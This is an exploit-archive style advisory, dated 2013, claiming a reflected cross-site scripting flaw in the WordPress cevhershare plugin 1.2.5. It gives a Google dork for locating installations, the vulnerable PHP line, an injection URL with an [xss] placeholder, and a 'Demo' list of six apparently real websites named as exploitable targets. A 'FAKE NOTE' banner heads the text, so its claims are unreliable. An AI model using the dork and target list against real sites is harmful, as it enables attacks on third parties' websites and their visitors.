!!!!!!!!!!!!!!!!!!!!!!
!!! FAKE NOTE !!!
!!!!!!!!!!!!!!!!!!!!!!
#######################################################################
# Exploit Title : Wordpress cevhershare plugin Cross site scripting Vulnerability
#
# Exploit Author : Ashiyane Digital Security Team
#
# Google Dork: : inurl:/wp-content/plugins/cevhershare
#
# Date: 2013/09/24
#
# Vendor Homepage : http://wordpress.org/plugins/cevhershare
#
# Software Link : http://downloads.wordpress.org/plugin/cevhershare.zip
#
# Version : 1.2.5
#
# Tested on: Windows
#
##############
#
# Location:http://site/wp-content/plugins/cevhershare/cevhershare-admin.php?page=[xss]
#
# Vuln Code :
#
# <form action="?page=<?php echo $_GET['page']; ?>" method="post">
# <p class="mediumtext alignleft">
#
##############
##############
# Demo:
#
# http://www.schaefferpXrecision.com/wp-content/plugins/cevhershare/cevhershare-admin.php?page=[xss]
#
# http://www.jaimealeXncar.com/wp-content/plugins/cevhershare/cevhershare-admin.php?page=[xss]
#
# http://pamlawhornXe.com/wp-content/plugins/cevhershare/cevhershare-admin.php?page=[xss]
#
# http://www.zmesXcience.com/cheap-moscow.com/blog/wp-content/plugins/cevhershare/cevhershare-admin.php?page=[xss]
#
# http://www.eaglXesgab.com/wp-content/plugins/cevhershare/cevhershare-admin.php?page=[xss]
#
# http://ikeymonXitor.com/wp-content/plugins/cevhershare/cevhershare-admin.php?page=[xss]
#